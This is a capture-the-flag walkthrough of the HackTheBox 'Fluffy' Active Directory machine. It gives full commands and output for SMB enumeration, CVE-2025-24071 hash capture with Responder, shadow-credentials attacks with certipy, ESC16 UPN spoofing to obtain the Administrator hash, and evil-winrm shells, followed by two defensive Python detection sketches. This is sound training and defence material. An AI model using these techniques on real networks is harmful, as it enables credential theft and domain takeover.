Fluffy - HackTheBox
Easy-rated Windows machine from the HackTheBox platform, part of the CPTS path.

We are given the credentials j.fleischman / J0elTHEM4n1990!, provided by HackTheBox in the room.
Port and Service Reconnaissance
We start with a basic port scan to check which ports are open on the target machine.
For this scan we use nmap.
nmap -p- -Pn -n <ip> --min-rate 5000
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49693/tcp open unknown
49709/tcp open unknown
49717/tcp open unknown
As we can see, the list of open ports is long, so I run a more detailed scan to gather more information about each open port.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-19 17:21:35Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-09-19T17:23:04+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-19T17:23:04+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-19T17:23:04+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-19T17:23:04+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2025-09-19T17:22:28
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
We discover the domain fluffy.htb and the host DC01.FLUFFY.HTB (which is the Domain Controller).
Port 88 (Kerberos)
Port 5985 - default port for WinRM HTTP connections
Port 445 - SMB
SMB - IT share
Since we have credentials, we first check whether they are valid for SMB with netexec.
netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
The credentials are valid, so we can list the shares.
netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.10.11.69 445 DC01 [*] Windows 10 / Server 2019 Build 17763
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.10.11.69 445 DC01 [*] Enumerated shares
SMB 10.10.11.69 445 DC01 Share Permissions Remark
SMB 10.10.11.69 445 DC01 ----- ----------- ------
SMB 10.10.11.69 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.69 445 DC01 C$ Default share
SMB 10.10.11.69 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.69 445 DC01 IT READ,WRITE
SMB 10.10.11.69 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.69 445 DC01 SYSVOL READ Logon server share
We have read and write permissions on the IT share, so the first step is to connect and see what we find.
smbclient //10.10.11.69/IT -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Sep 19 19:36:03 2025
.. D 0 Fri Sep 19 19:36:03 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 17:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 17:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 17:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 17:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 16:31:07 2025
5842943 blocks of size 4096. 1621122 blocks available
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (520,3 KiloBytes/sec) (average 520,3 KiloBytes/sec)
We find a .pdf document with the following content:
It is a short report communicating the vulnerabilities found in the corporate infrastructure, listing the CVE and severity of each one.
Before continuing we look into each vulnerability one by one to find out whether any of them could be abused to gain access to the target machine.
CVE-2025-24071
We can leverage CVE-2025-24071 to obtain the hash of a domain user by uploading a .zip file to the SMB share and listening with the Responder tool.
To learn more about this vulnerability I recommend the links of interest at the end of this document.
For the exploitation I use the following tool, which generates the zip file to upload.
https://github.com/0x6rss/CVE-2025-24071_PoC
smbclient //10.10.11.69/IT -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
smb: \> put elc4br4.zip
putting file elc4br4.zip as \elc4br4.zip (2,9 kb/s) (average 2,9 kb/s)
sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.21]
Responder IPv6 [dead:beef:2::1013]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-L91XIJC6X1U]
Responder Domain Name [MRKH.LOCAL]
Responder DCE-RPC Port [46419]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:<HASH>
We obtain the NTLMv2 hash of user p.agila, which we attempt to crack with John the Ripper.
Bloodhound
At this point I use the newly obtained credentials to run BloodHound, look for misconfigurations and try to abuse one of them.
bloodhound-python -c all -d fluffy.htb -u p.agila -p 'password' --zip -ns 10.10.11.69
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250919131622_bloodhound.zip
In BloodHound we see that user p.agila belongs to the Service Account Managers group, which has GenericAll over the Service Accounts group, so we can add ourselves to that group.
Once we are members of Service Accounts we have GenericWrite over other users, which lets us carry out a Shadow Credentials attack.
Shadow Credential Attack
- First we add user p.agila to the Service Accounts group.
bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p 'password' add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts
- Abuse GenericWrite over the winrm_svc user (with pywhisker.py or, as below, certipy shadow auto).
certipy shadow auto -u 'p.agila@fluffy.htb' -p 'password' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'fe8a3af3-dde4-7a17-e5af-cd105ae52ef2'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': <NT-HASH>
- Now that we have the NT hash of winrm_svc we can connect to the target machine via evil-winrm.
evil-winrm -i 10.10.11.69 -u winrm_svc -H <NT-HASH>
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> hostname
DC01
User ca_svc
The next step is to obtain the hash of the ca_svc user in the same way we did for winrm_svc.
certipy shadow auto -u 'p.agila@fluffy.htb' -p 'password' -account 'ca_svc' -dc-ip 10.10.11.69
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'd21378a5-e675-3430-53b9-51791aa524d0'
[*] Adding Key Credential with device ID 'd21378a5-e675-3430-53b9-51791aa524d0' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'd21378a5-e675-3430-53b9-51791aa524d0' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': <NT-HASH-CA_SVC>
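From the defender's side, the two shadow-credentials runs above (against winrm_svc and ca_svc) leave a recognisable trail: a group-membership change by p.agila followed by writes to msDS-KeyCredentialLink on another account, with the key credential added and then removed again (the "Restoring the old Key Credentials" step). The following detection sketch was written for this writeup and is not part of Certipy, bloodyAD or the machine; the events are constructed dicts modelled on Security events 4728 (member added to a global group) and 5136 (directory object modified), and in a real environment 5136 only appears if auditing of that attribute is enabled via a SACL on the user objects.

```python
from datetime import datetime, timedelta

KEYCRED_ATTR = "msDS-KeyCredentialLink"
OP_ADD, OP_DEL = "%%14674", "%%14675"   # 5136 OperationType: value added / value deleted

# Constructed sample events mirroring the sequence in the writeup (not real logs).
SAMPLE_EVENTS = [
    {"id": 4728, "time": "2025-09-19T13:20:01", "subject": "p.agila",
     "group": "Service Accounts", "member": "CN=p.agila,CN=Users,DC=fluffy,DC=htb"},
    {"id": 5136, "time": "2025-09-19T13:20:40", "subject": "p.agila", "attr": KEYCRED_ATTR,
     "object": "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb", "op": OP_ADD},
    {"id": 5136, "time": "2025-09-19T13:20:44", "subject": "p.agila", "attr": KEYCRED_ATTR,
     "object": "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb", "op": OP_DEL},
    # Benign: an object writing its own key credential (e.g. device/WHfB enrolment).
    {"id": 5136, "time": "2025-09-19T09:00:00", "subject": "DC01$", "attr": KEYCRED_ATTR,
     "object": "CN=DC01,OU=Domain Controllers,DC=fluffy,DC=htb", "op": OP_ADD},
]

def _ts(e):
    return datetime.fromisoformat(e["time"])

def _cn(dn):
    # First RDN value of a distinguished name: "CN=winrm_svc,..." -> "winrm_svc"
    return dn.split(",")[0].split("=", 1)[1]

def detect_shadow_credentials(events, window=timedelta(minutes=30)):
    """Return alert strings for: (1) a principal writing msDS-KeyCredentialLink on an
    object other than itself, (2) that key credential being removed again within minutes
    (the add/restore pattern of 'certipy shadow auto'), and (3) a group-membership change
    by the same subject within `window` before the write."""
    alerts = []
    keycred = [e for e in events if e["id"] == 5136 and e["attr"] == KEYCRED_ATTR]
    group_adds = [e for e in events if e["id"] == 4728]
    for e in (k for k in keycred if k["op"] == OP_ADD):
        target = _cn(e["object"])
        if e["subject"].rstrip("$").lower() == target.lower():
            continue  # self-write: the object enrolling its own key
        alerts.append(f"{e['subject']} wrote {KEYCRED_ATTR} on {target} at {e['time']}")
        removed = [r for r in keycred if r["object"] == e["object"] and r["op"] == OP_DEL
                   and timedelta(0) <= _ts(r) - _ts(e) <= timedelta(minutes=5)]
        if removed:
            alerts.append(f"key credential on {target} added and removed within minutes (restore pattern)")
        for g in group_adds:
            if g["subject"] == e["subject"] and timedelta(0) <= _ts(e) - _ts(g) <= window:
                alerts.append(f"{e['subject']} added {_cn(g['member'])} to '{g['group']}' shortly before the write")
    return alerts

if __name__ == "__main__":
    for line in detect_shadow_credentials(SAMPLE_EVENTS):
        print("[ALERT]", line)
```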
Privilege Escalation
We have the hash of the ca_svc user, and the account name itself hints at where privilege escalation may go...
We look for vulnerable certificate templates with certipy.
certipy-ad find -u 'ca_svc' -hashes <hash> -dc-ip 10.10.11.69 -vulnerable -enabled -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
ESC16
The output shows the CA flagged as vulnerable to ESC16 (the security extension 1.3.6.1.4.1.311.25.2 is disabled), so we proceed to exploit it.
- Change the UPN of ca_svc to administrator.
certipy-ad account update -username "p.agila@fluffy.htb" -p "password" -user ca_svc -upn 'administrator'
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
- Request the certificate with the credentials of ca_svc.
certipy-ad req -u 'ca_svc' -hashes <hash> -dc-ip 10.10.11.69 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template User
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
- Set the UPN back to its original value.
certipy-ad account update -username "p.agila@fluffy.htb" -p "password" -user ca_svc -upn 'ca_svc@fluffy.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
- Use the administrator.pfx certificate to authenticate and obtain the NTLM hash of the Administrator user.
certipy-ad auth -pfx administrator.pfx -domain 'fluffy.htb' -dc-ip 10.10.11.69
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': <NTLM HASH>
- Finally we use the hash to connect over WinRM and read the flag.
evil-winrm -i 10.129.232.88 -u administrator -H <HASH>
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir C:\Users\Administrator\Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/8/2026 8:54 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
fluffy\administrator
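The ESC16 sequence above (set the UPN of ca_svc to administrator, request a User certificate, set the UPN back) is short-lived in the directory but visible in the logs. This detection sketch was written for this writeup and is not Certipy's code; it models Security events 4738 (user account changed, carrying the new UPN) and 4887 (Certificate Services issued a certificate) as constructed dicts with simplified field names, and uses a constructed account snapshot to spot a UPN that collides with another principal's name. The remediation for the CA itself is to re-enable the 1.3.6.1.4.1.311.25.2 extension, which is outside what this script checks.

```python
from datetime import datetime, timedelta

# Constructed directory snapshot: sAMAccountName -> expected UPN.
ACCOUNTS = {"administrator": "administrator@fluffy.htb", "ca_svc": "ca_svc@fluffy.htb",
            "p.agila": "p.agila@fluffy.htb", "winrm_svc": "winrm_svc@fluffy.htb"}

# Constructed sample events mirroring the writeup (not real logs).
SAMPLE_EVENTS = [
    {"id": 4738, "time": "2025-09-19T14:01:00", "subject": "p.agila", "target": "ca_svc",
     "upn": "administrator"},
    {"id": 4887, "time": "2025-09-19T14:01:30", "requester": "FLUFFY\\ca_svc",
     "template": "User", "request_id": 16},
    {"id": 4738, "time": "2025-09-19T14:02:10", "subject": "p.agila", "target": "ca_svc",
     "upn": "ca_svc@fluffy.htb"},
    # Benign rename: new UPN does not match any other existing account.
    {"id": 4738, "time": "2025-09-19T10:00:00", "subject": "hr_admin", "target": "j.fleischman",
     "upn": "joel.fleischman@fluffy.htb"},
]

def _ts(e):
    return datetime.fromisoformat(e["time"])

def _local(upn):
    return upn.split("@")[0].lower()   # "administrator@fluffy.htb" -> "administrator"

def detect_upn_swap(events, accounts, window=timedelta(minutes=30)):
    """Return alerts for a UPN change that collides with another account's name, a
    certificate issued to the modified account while that UPN was set, and a revert of
    the UPN within `window` (the hide-the-tracks step seen in the writeup)."""
    alerts = []
    changes = sorted((e for e in events if e["id"] == 4738), key=_ts)
    issued = [e for e in events if e["id"] == 4887]
    for i, e in enumerate(changes):
        local = _local(e["upn"])
        if local == e["target"].lower() or local not in accounts:
            continue  # UPN still names the account itself, or collides with nobody
        alerts.append(f"{e['subject']} set UPN of {e['target']} to '{e['upn']}' (collides with {local})")
        for c in issued:
            if c["requester"].split("\\")[-1].lower() == e["target"].lower() \
                    and timedelta(0) <= _ts(c) - _ts(e) <= window:
                alerts.append(f"request {c['request_id']} ({c['template']}) issued to {e['target']} "
                              f"while the foreign UPN was set")
        for r in changes[i + 1:]:
            if r["target"] == e["target"] and _local(r["upn"]) == e["target"].lower() \
                    and _ts(r) - _ts(e) <= window:
                secs = int((_ts(r) - _ts(e)).total_seconds())
                alerts.append(f"UPN of {e['target']} reverted {secs}s later (cover-up pattern)")
                break
    return alerts

if __name__ == "__main__":
    for line in detect_upn_swap(SAMPLE_EVENTS, ACCOUNTS):
        print("[ALERT]", line)
```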
LINKS - CVE-2025-24071
https://nvd.nist.gov/vuln/detail/CVE-2025-24071
https://www.incibe.es/index.php/incibe-cert/alerta-temprana/vulnerabilidades/cve-2025-24071